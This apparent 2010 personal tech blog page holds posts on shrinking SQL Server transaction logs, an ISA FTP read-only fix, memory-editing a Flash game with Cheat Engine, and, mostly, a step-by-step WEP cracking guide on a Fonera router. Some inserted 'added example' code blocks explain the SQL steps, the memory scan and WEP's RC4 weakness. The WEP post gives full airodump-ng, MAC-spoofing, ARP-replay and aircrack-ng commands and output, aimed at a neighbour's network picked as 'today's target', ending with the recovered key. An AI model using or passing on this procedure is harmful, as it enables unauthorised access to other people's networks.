Hackviking.com He killed Chuck Norris, he ruled dancing so he took up a new hobby…

20 Apr 2010

SQL transaction logs growing and growing and …

Transaction logs that keep growing are a common problem on SQL servers, but many admins don't think twice about it; they just add more disk space. In the FULL recovery model the log is only truncated by log backups, and what it buys you is the ability to restore to a point in time other than the last backup. If you never take log backups, or never need that kind of restore, the log is just eating space on your RAID 10 disks, which are more expensive than your backup media. To release all of that space you set the database to the SIMPLE recovery model, shrink it, and then put it back into FULL recovery. Be aware that the switch to SIMPLE breaks the log backup chain, so take a full backup afterwards if you rely on log backups. So why not do this automatically once a week, right after the backup?

Just add a T-SQL task to your maintenance plan and run the code below. It uses the undocumented but widely used sp_MSForEachDB and skips the system databases, since tempdb refuses to leave the SIMPLE recovery model and master, model and msdb should be left alone:

EXEC sp_MSForEachDB
'IF ''?'' NOT IN (''master'', ''model'', ''msdb'', ''tempdb'')
BEGIN
    ALTER DATABASE [?] SET RECOVERY SIMPLE;
    DBCC SHRINKDATABASE ([?], 10, TRUNCATEONLY);
    ALTER DATABASE [?] SET RECOVERY FULL;
END';

Or, if you want to build a custom list of databases so you don't run this on all of them, run this code to generate the T-SQL and then keep the statements you want (the doubled single quotes are needed because the whole command is itself a string):

EXEC sp_MSForEachDB
'IF ''?'' NOT IN (''master'', ''model'', ''msdb'', ''tempdb'')
BEGIN
    PRINT ''ALTER DATABASE [?] SET RECOVERY SIMPLE;'';
    PRINT ''GO'';
    PRINT ''DBCC SHRINKDATABASE ([?], 10, TRUNCATEONLY);'';
    PRINT ''GO'';
    PRINT ''ALTER DATABASE [?] SET RECOVERY FULL;'';
    PRINT ''GO'';
END';

The important thing is TRUNCATEONLY. Without it, DBCC SHRINKDATABASE takes pages from the end of the data file and drops them into the first free slot at the front, page by page, which fragments your indexes. With TRUNCATEONLY it only releases the free space at the end of the files to the operating system and moves nothing (the target percentage is ignored when TRUNCATEONLY is given).
Another way to do it, which is slower and generates more disk IO, is to take a transaction log backup and then just delete the log backup file. The log backup truncates the inactive part of the log without ever leaving the FULL recovery model, but deleting the file throws away the point-in-time restore it would have given you.
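As an added example, not code from the original post, here is the check a DBA should run before shrinking anything, followed by the post's method for a single database with the full backup that restarts the log backup chain, and the log-backup alternative. The database name MyDb, the log file name MyDb_log and the D:\Backup paths are assumptions; the catalog views need SQL Server 2005 or later.

```sql
-- Added example, not from the original post. Assumes SQL Server 2005+ and a database
-- called MyDb whose log file is named MyDb_log (both names and the paths are assumptions).

-- 1. Before shrinking, see how big each log is and WHY it is not being reused.
--    LOG_BACKUP in log_reuse_wait_desc means FULL recovery with no log backups being
--    taken, which is exactly the situation the post describes.
SELECT  d.name,
        d.recovery_model_desc,
        d.log_reuse_wait_desc,
        mf.name                 AS log_file,
        mf.size * 8 / 1024      AS log_size_mb     -- size is counted in 8 KB pages
FROM    sys.databases      AS d
JOIN    sys.master_files   AS mf
        ON mf.database_id = d.database_id
       AND mf.type_desc   = 'LOG'
WHERE   d.database_id > 4                         -- skip master, tempdb, model, msdb
ORDER BY log_size_mb DESC;

-- 2. The post's method for one database, plus the full backup that re-seeds the
--    log backup chain broken by the switch to SIMPLE.
ALTER DATABASE MyDb SET RECOVERY SIMPLE;
DBCC SHRINKDATABASE (MyDb, 10, TRUNCATEONLY);     -- moves no pages; the 10 is ignored
ALTER DATABASE MyDb SET RECOVERY FULL;
BACKUP DATABASE MyDb TO DISK = N'D:\Backup\MyDb_full.bak' WITH INIT;

-- 3. The alternative that never leaves FULL recovery: a log backup truncates the
--    inactive part of the log, after which only the log file needs shrinking.
USE MyDb;
BACKUP LOG MyDb TO DISK = N'D:\Backup\MyDb_log.trn';
DBCC SHRINKFILE (MyDb_log, 512);                  -- target size in MB; keep the .trn file
```

Run step 1 first: a database whose log_reuse_wait_desc says ACTIVE_TRANSACTION or REPLICATION will not give its space back no matter how often you shrink it, so the weekly job would just churn the disks.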

MS documentation: http://msdn.microsoft.com/en-us/library/ms190488.aspx

16 Apr 2010

IIS 7 FTP access denied while uploading files

I got this strange problem yesterday at work. One of our developers was trying to upload files to a new server and he got 500 access denied each time he tried. After he spent hours double-checking all the NTFS rights and IIS settings he asked me for help. At first I thought the IIS server had been messed up somehow. After verifying that everything he told me was OK (after all he is a coder and they usually don't understand servers), I really didn't know what to do next. So I thought about it for a moment and then I started from scratch and checked the entire solution from the bigger picture.

So with the system blueprint in front of me it all started to clear up. The server was situated in our server center across town and all his traffic was passing through a VPN tunnel between our two ISA 2006 servers. The ISA server sets all FTP rules to "Read-Only" by default, but I didn't realise that this also applied to the site-to-site VPN tunnel. After checking the routing rule and then the access rule for the communication between the two networks I found the settings for FTP traffic between the two ISA servers. After I unchecked the "Read-Only" check box for the FTP traffic on the site-to-site VPN access rule it all worked as designed.

14 Apr 2010

World Domination II Hack

I was trying to pass the time the other night while waiting on a very slow crypto crack. On one of my servers I found the old flash game World Domination II. First I played it over and over again, but then I wanted the edge. Like when the US goes to war with superior technology, money and control over the media. First I googled it to see if someone had already done the work for me, just like you did when you found this. I actually found a hacked version online with limitless cash and less cash for the opponents. But I wanted more. So you can start out by testing the online hacked version and then follow the tutorial below.

World Domination 2 (full) - Hacked (www.arcadeprehacks.com): Easy, Medium and Hard all start with $999999,000,000, and the enemies' money is lowered to $50.000.000.
http://www.arcadeprehacks.com/game/413/World-Domination-2-(full).html

First get Cheat Engine: http://www.cheatengine.org/downloads.php
Install it and start it!

In the top left corner there is a computer icon, click it.
You will see a list of processes that you can "hook" on to.
If you're running the game online, hook on to your browser process (iexplore.exe or firefox.exe); if you're running the downloaded version, hook on to WDII.exe.

Now start the game, select your opponents and level, and start.
I selected hard, so I have $55.000.000 in cash. The game keeps its numbers in memory multiplied by 8, so I take 55 * 8 = 440.
Switch to Cheat Engine, put 440 in the Value box and hit First Scan.

You will get a number of hits that we can sort through later. Now return to the game and either gain money through Resources or spend some money.

I selected Resources and gained some cash, so now I'm up to $86.000.000. So I take 86 * 8 = 688.
Go back to Cheat Engine, put that in the Value box and hit Next Scan.
You will be left with two results. Double-click them both, change them to something like 8000 and then freeze them. You have to change both of them, otherwise you can't spend any money and just look at a pretty number on the dashboard.

Before you do anything else, go back to the game, hit the Propaganda button, select a city and check your propaganda strength. Mine was 71%, so 71 * 8 = 568.
Put that in the Value field of Cheat Engine, hit New Scan and then First Scan.

Again a large number of hits, so do something in the game to change your propaganda strength.
My new strength was 87%, so 87 * 8 = 696. Put that in the Value field and hit Next Scan.
Double-click the value, change it to 800 and freeze it, and you will have 100% propaganda forever.
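The whole first-scan, next-scan, change-and-freeze sequence above is a differential memory search, and it is easier to see what Cheat Engine does by running the same filter yourself. The block below is an added example, not code from the original post or from Cheat Engine: it builds a small constructed "process memory" in which the cash value lives in two cells (which is why both hits had to be changed) next to a decoy that happens to hold the same number, then replays the post's 55 -> 86 cash and 71 -> 87 propaganda steps. The multiply-by-8 storage is taken from the post; the offsets and the decoy are invented for the example.

```python
"""Added example, not code from the original post or from Cheat Engine: the
first-scan / next-scan / freeze sequence the post walks through, run against a
constructed 256-byte "process memory" so it works offline.  The post's observation
that the game keeps every number multiplied by 8 is modelled by SCALE.  The
offsets 0x10/0x20/0x40/0x80 and the decoy cell are made up for the example."""
from __future__ import annotations

import struct

SCALE = 8  # 55 * 8 = 440 in the post: what the game writes for a cash value of 55


def encode(game_value: int) -> int:
    """In-memory representation of a value shown in the game."""
    return game_value * SCALE


def decode_at(memory: bytes, offset: int) -> int:
    """Read one cell back as a game value."""
    return struct.unpack_from("<i", memory, offset)[0] // SCALE


def first_scan(memory: bytes, game_value: int) -> list[int]:
    """Cheat Engine's First Scan: every aligned 4-byte cell equal to the encoded value."""
    target = encode(game_value)
    return [off for off in range(0, len(memory) - 3, 4)
            if struct.unpack_from("<i", memory, off)[0] == target]


def next_scan(memory: bytes, candidates: list[int], game_value: int) -> list[int]:
    """Cheat Engine's Next Scan: keep only candidates that followed the value change."""
    target = encode(game_value)
    return [off for off in candidates
            if struct.unpack_from("<i", memory, off)[0] == target]


def poke(memory: bytearray, offsets: list[int], game_value: int) -> None:
    """Write (and, in Cheat Engine, freeze) a new value in every remaining cell."""
    for off in offsets:
        struct.pack_into("<i", memory, off, encode(game_value))


def build_snapshot(cash: int, propaganda: int) -> bytearray:
    """Constructed memory: cash lives in two cells (display and game logic, which is
    why the post says both hits must be changed), propaganda in one, plus a decoy that
    happens to hold the same number as cash at first-scan time."""
    mem = bytearray(256)
    struct.pack_into("<i", mem, 0x10, encode(cash))        # cash, display copy
    struct.pack_into("<i", mem, 0x40, encode(cash))        # cash, logic copy
    struct.pack_into("<i", mem, 0x20, encode(cash))        # decoy: never changes
    struct.pack_into("<i", mem, 0x80, encode(propaganda))  # propaganda strength
    return mem


def demo() -> dict:
    """Replay the post's steps: 55 -> 86 cash, 71 -> 87 propaganda, then freeze."""
    mem = build_snapshot(cash=55, propaganda=71)
    hits = first_scan(mem, 55)                  # three cells hold 440, one is a decoy

    # "gain money through Resources": the game updates the real cash cells only
    for off in (0x10, 0x40):
        struct.pack_into("<i", mem, off, encode(86))
    cash_cells = next_scan(mem, hits, 86)       # the decoy still holds 440 and drops out
    poke(mem, cash_cells, 8000)

    # New Scan + First Scan on propaganda strength, then change it in the game
    prop_hits = first_scan(mem, 71)
    struct.pack_into("<i", mem, 0x80, encode(87))
    prop_cells = next_scan(mem, prop_hits, 87)
    poke(mem, prop_cells, 100)

    return {
        "first_scan_hits": hits,
        "cash_cells": cash_cells,
        "propaganda_cells": prop_cells,
        "final_cash": decode_at(mem, 0x10),
        "final_propaganda": decode_at(mem, 0x80),
    }


if __name__ == "__main__":
    print(demo())
```

The reason a single scan is never enough is visible in the decoy: any cell that merely equals 440 at the moment of the first scan survives it, and only a value change in the game tells the two kinds of cell apart.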

You can change all the other values of the game, like the number of warheads and so on, but that really takes all the fun out of it. Now you can build whatever you want and start diplomatic relations with whoever you want.

5 Apr 2010

WEP Cracking with Fon (Fonera) router

I usually use my Fon router for the collection work when cracking wlans. I recently moved to a new apartment in my hometown, and this is what I call a target-rich environment: 15 wlans with good signal right at my desk. That is just too good to be true! So here is a little rundown on how to do this easily. The guide can also be used with other hardware, but it has some special info just for the Fonera.

Here is a guide to hacking your Fonera router:
http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a Linux computer for your pocket, much like your iPhone if you have one. The big difference is that this Linux pocket computer is great for wlan work. First start an SSH session to the router and log in.

We need to set up the wlan card for our use. If you're connected via the "Legend" wlan you have to keep that interface. I prefer to connect to the router by cable and destroy the "Legend" network before I begin (wlanconfig ath0 destroy). Either way, the rest of the guide uses ath1.

So lets begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

wlanconfig ath1 create wlandev wifi0 wlanmode monitor

Then we want a list of the networks around us that we can attack. Running airodump-ng with just the interface and no other parameters gives us a list of the wlans in range.

airodump-ng ath1

The router responds with a list of networks, with information about their encryption, and also a list of the clients the card picks up.
In the list below no clients are seen, but they usually show up; this was just a quick scan to show the principle. When you have your list, hit CTRL + C to get back to the prompt.

CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes

My unlucky neighbour who has chosen to call his or her wlan MAD will be today's target. I selected it because it is MAC filtered: if the correct MAC isn't in the router's "allowed list" or "white list" I will be unable to connect. To handle the amount of data I need to collect to crack the WEP key, I need to mount a network share on the FON router. In this case I will connect the FON to a share on my Windows 7 box. First create an account on the Windows box with no spaces in the user name and give it a password. Then share a folder and give that account read/write access. Then mount it on the FON router.

In the /mnt folder run the command:

mkdir share

Then mount the share on that folder like this (the password ends up in the shell history and in the process list on the router, so use a throw-away account on the Windows box):

mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME> -o username=<USERNAME>,password=<PASSWORD> /mnt/share

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1

So what have we done now? We gave airodump-ng some important information:

-c 3

Listen on channel 3 only. If we omit this parameter it hops up and down the channels and misses most of the frames we want.

--bssid 00:18:4D:8C:52:0E

The MAC address of the access point, so it only records traffic for that network.

-w /mnt/share/MAD

W stands for "write": airodump-ng dumps everything it captures into files with that prefix on the Windows share (the first capture file is called MAD-01.cap).

ath1

The wlan instance to use.

The router also shows the information in real time while it collects the IVs (initialization vectors) we need for the crack.

CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5

Now you can see the connected client as well. When I started attacking this network I didn't know it had a MAC filter, but I found out pretty quickly when I couldn't associate or authenticate with it. If you can't do an association like the one below, or if packet injection fails (no packets are sent), you are probably talking to a MAC-filtered router. So how do we solve this? We fake our MAC!

If you have no problem associating with the station like below, you can skip the MAC spoofing step.

aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful :-)

So what did I do here? I did a "fake authentication" against the router to see if it lets me connect. Note that -h (my client MAC) is the same as the client I found earlier.
In this screenshot I had already faked my MAC to be able to connect to the router; I didn't save a screenshot of the failure. A quick rundown of the command above:

-1

Fake Authentication attack

0

Reassociation timing in seconds, i.e. how often to resend the authentication/association request (depending on the router you get dropped after a while and need to re-authenticate; 0 runs a single authentication).

-e "MAD"

The SSID of the router.

-a  00:18:4D:8C:52:0E

The MAC address of the router.

-h  00:22:43:6E:BD:F5

The MAC address of the client. In this case a spoofed one, to get around the MAC filter, but in all other cases you can use your own MAC or just 1:2:3:4:5:6.

ath1

The wlan instance to use.

This raises two questions. First, how do you find your own MAC?

ifconfig

This shows all the info on all your network devices, and you can read the MAC address of wifi0 from it.
Second, how do I spoof my MAC?

ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up

Now we have changed the MAC address of the card to what we need. In some cases you get an error like "Device Not Ready"; just destroy all the athX instances before you take wifi0 offline and it will probably succeed.

Now we can access the network, so let's get to it. If you had to destroy ath1 when you changed your MAC, just create it again as we did before.
Then start airodump-ng with the write option again:

airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1

Then start a second SSH session to the FON and log in again. Now we will speed the process up a lot. The #Data column in airodump-ng (first session) counts the captured IVs. The old rule of thumb was around 250,000 IVs for a 104-bit (128-bit WEP) key and over 800,000 for longer keys, but the PTW attack that aircrack-ng 1.0 uses by default usually succeeds with far fewer, which is why the crack below worked with about 170,000. You can collect that much by just listening to the traffic, but it can take days or even weeks, so we help it along with an ARP replay attack from the second session. ARP is how network gear keeps track of which device has which IP address and MAC address combination. An encrypted ARP request is easy to recognise by its fixed size, and when we replay one the access point rebroadcasts it to its clients, encrypting it with a fresh IV each time; every one of those rebroadcasts is a new data frame we can use to crack the key. So let's get the IVs coming!

aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1

This will start sending packets in large numbers; the FON manages about 40-50 packets per second. Because we spoofed an allowed MAC our traffic now gets through the filter. If the "packets sent" counter stops, you have usually lost your association with the router: hit CTRL + C and run the fake authentication again. If this keeps happening, change -1 0 to something like -1 20 so it re-associates every 20 seconds, and run that in a third session so everything runs at once.
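What the collection step above is really harvesting is a pair (IV, first keystream bytes) per captured frame, and the ARP replay works because every rebroadcast carries the same known plaintext under a new IV. The block below is an added example, not code from the original post or from the aircrack-ng suite: a minimal model of a WEP data frame (clear 3-byte IV, RC4 keyed with IV||key, CRC-32 integrity value) that shows how the known LLC/SNAP header at the start of every ARP frame gives away keystream bytes for each IV, and how reusing an IV leaks the XOR of two plaintexts. The key, the IVs and the ARP payload are constructed test data.

```python
"""Added example, not code from the original post or from the aircrack-ng suite: a
minimal model of a WEP data frame (clear 3-byte IV, RC4 keyed with IV||key, CRC-32
ICV) that shows what the IV collection in the post is actually harvesting.  The
key, IVs and ARP payload are constructed test data."""
from __future__ import annotations

import zlib

# Every WEP data frame carrying IP or ARP starts with this LLC/SNAP header; the last two
# bytes are the EtherType, 0x0806 for ARP.  Known plaintext like this is what turns each
# captured frame into (IV, keystream prefix), the input the statistical key attacks need.
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA + PRGA).  WEP uses the keystream from its very first byte,
    which is what the FMS/KoreK/PTW attacks on the IV||key setup exploit."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """iv || RC4(iv || key)(payload || CRC32(payload)).  The IV travels in the clear."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + xor(payload + icv, rc4_keystream(iv + key, len(payload) + 4))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Strip the IV, regenerate the keystream and check the ICV."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("ICV check failed")
    return payload


def keystream_prefix(frame: bytes, known_plaintext: bytes) -> tuple[bytes, bytes]:
    """What a cracker extracts per captured frame: the IV and the first keystream bytes,
    obtained by XORing the ciphertext with the plaintext everyone knows is there."""
    iv = frame[:3]
    return iv, xor(frame[3:3 + len(known_plaintext)], known_plaintext)


def demo() -> dict:
    key = bytes.fromhex("0102030405060708090a0b0c0d")               # constructed 104-bit key
    arp = SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20)  # constructed ARP request

    # The replay attack makes the AP rebroadcast the same ARP request under new IVs ...
    frames = [wep_encrypt(key, n.to_bytes(3, "big"), arp) for n in range(5)]
    # ... and each one hands the attacker 8 keystream bytes for a known IV.
    pairs = [keystream_prefix(f, SNAP_ARP) for f in frames]
    recovered_ok = all(ks == rc4_keystream(iv + key, len(SNAP_ARP)) for iv, ks in pairs)

    # With only 2^24 IVs, reuse is inevitable; two frames under one IV leak p1 XOR p2.
    f1 = wep_encrypt(key, b"\x00\x00\x01", b"attack at dawn")
    f2 = wep_encrypt(key, b"\x00\x00\x01", b"attack at dusk")
    leaked = xor(f1[3:], f2[3:])[:14]

    return {
        "roundtrip_ok": wep_decrypt(key, frames[0]) == arp,
        "keystreams_recovered": recovered_ok,
        "distinct_ivs": len({iv for iv, _ in pairs}),
        "plaintext_xor": leaked,
    }


if __name__ == "__main__":
    print(demo())
```

The statistical key recovery itself (what aircrack-ng does with those pairs) is deliberately not reimplemented here; the point is that the collection phase needs no secret at all, only the clear IV and eight bytes of plaintext that every ARP frame is known to start with.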

Once we have collected enough IVs we can start cracking. I usually start aircrack-ng on the capture file before the collection is done; if no key is found it re-runs the attack every 5,000 new IVs. This is not a job for the FON with its limited processing power, so I use my Linux box or my Windows box instead. On Windows there is a GUI, and if you made it this far you will figure that out. On the command line it is (airodump-ng appends -01 to the prefix we gave with -w, so the file is MAD-01.cap):

aircrack-ng c:\temp\fonera\MAD-01.cap

The result will be something like this:

Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%

As you can see I only needed a little over 170,000 IVs, and once the crack succeeded I could stop the attack on the network.
So now we have the key:

04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A

People who get this far still ask me one question: "How do I use that key from Windows?"
The router accepts both ASCII passphrases and hex keys like the one above. Just remove the colons from the key (leaving 26 hex characters) and Windows will be able to connect to the network.